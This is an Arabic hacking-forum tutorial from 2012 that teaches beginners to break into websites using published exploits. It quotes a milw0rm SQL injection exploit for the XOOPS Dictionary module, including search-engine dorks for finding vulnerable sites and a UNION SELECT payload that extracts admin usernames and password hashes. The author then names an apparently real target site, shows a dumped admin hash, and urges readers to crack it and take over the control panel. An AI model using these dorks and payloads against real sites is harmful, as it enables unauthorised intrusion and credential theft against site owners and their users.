منتديات جنون الهكرز
Welcome

اهلا وسهلا بكـ فيـ شبكة ومنتديات جنون الهكر

اذا كنت عضو في المنتدى قم بتسجيل الدخول

او اذا كنت غير مسجل قم بالانضمام عن طريق التسجيل

في المنتدى ليصلك كل شئ عن الهكر

منتديات جنون الهكرز

كل ما يخص الهكر تطوير المنتدى تطوير المواقع اختراق اختراق الايميلات اختراق المواقع اختراق الاجهزة ادواة الاختراق تعليم الاختراف تعليم الهكرز برامج اغاني افلام دوراة هكرز دوراة اختراق
 
الرئيسيةشبكة جنون الهكراليوميةمكتبة الصورس .و .جبحـثالتسجيلدخول











شاطر | 
 

 تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
azooz princ
مصمم المنتدى
مصمم المنتدى
avatar

الجنس : ذكر
عدد المساهمات : 178
تاريخ الميلاد : 03/03/1992
تاريخ التسجيل : 13/07/2009
25
الموقع : http://hakrs10.yoo7.com/
العمل/الترفيه العمل/الترفيه : الكمبيوتر
المزاج رايق

مُساهمةموضوع: تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏    الثلاثاء مايو 22, 2012 4:49 am

بسم الله الرحمن الرحيم
هذا الدرس يـ اخوان الى المبتدئين
يعني المحترفين ما راح يحتاجو الى هذا الدرس
هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها
الان



نروح الى احد مواقع الثغرات الكثيره
وانا اخترت الميل ورم لانه اسهل واحد
نفتح الصفحة الرئيسيه للموقع
milw0rm - exploits : vulnerabilities : videos : papers : shellcode
الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
الا هي
ثالث خيار

الي لونهم بـ الاصفر
هذول جدد بـ تاريخ اليوم
والي لونهم اخضر يعني اقدم
وطبعا التاريخ مكتوب على جنب
انا بختار وحدة من الثغرات الموجوده
و اخترت هذي الثغره
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
مكتوب فيها كـ التالي
كود:

##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : milw0rm - S@BUN
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]

طيب نشرح شوي شوي
الجزاء الاول


كود:

XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection


هذي معلومات عن الثغره
نوعيتها و وين الثغره موجوده و في اي اصدار
طيب
الثغره هذي في سكريبت اسمه XOOPS
وهذي مجله طبعا
على اية حال الثغره في dictionary
الا هو الدليل
والاصدارات هي
0.94-0.91-0.70
والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
وهي معلومات عن مكتشف الثغره

كود:

#
##AUTHOR : S@BUN
#
####HOME : milw0rm - S@BUN
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#

###########################################
والان اهم جزئين
الجزاء الاول الدورك

###########################################
كود:

#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#

شنو هذا الدورك
هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
فـ لو كتبت في قوقل

كود:

allinurl: "modules/dictionary"

راح يطلع لك كل المواقع الي موجود فيها هذا
على اية حال
نختار موقع من المواقع
وانا اخترت

كود:

Southwestern Pennsylvania League of Apparition Technologists - Dictionary

نروح الى الجزاء الثاني المهم
الا وهو

كود:

###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################

وهذا كود الإستغلال
يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
وراح يصير رابط الموقع مع الاستغلال كذا
كود:

Southwestern Pennsylvania League of Apparition Technologists

/*
فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
طبعا الموضوع ما ينتهي هنا
الباسوورد مشفر بـ الـ MD5
والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
يعني الباسوورد مشفر والاسم موجود جنبه
وهم كذا
ARC-753: a19010808cc277ac5cc50548d7a61e8e
الي بـ الون الاحمر هذا الباسوورد المشفر
والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
النقطتين الرئسيتين فقط لتفريق بينهم
بعد ما تفك باسوورد الموقع
تدخل لوحة تحكم الموقع وتسوي الي يعجبك

_________________

للاستفسار او طلب المساعدة


hakrs_10@hotmail.com




عدل سابقا من قبل Digital Processor في الثلاثاء مايو 22, 2012 4:50 am عدل 1 مرات (السبب : خطأ في الاكواد)
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://hakrs10.yoo7.com
 
تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع) ‏
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات جنون الهكرز :: الاقسمة الخاصة بالاختراق والهكرز :: قسم الثغرات-
انتقل الى: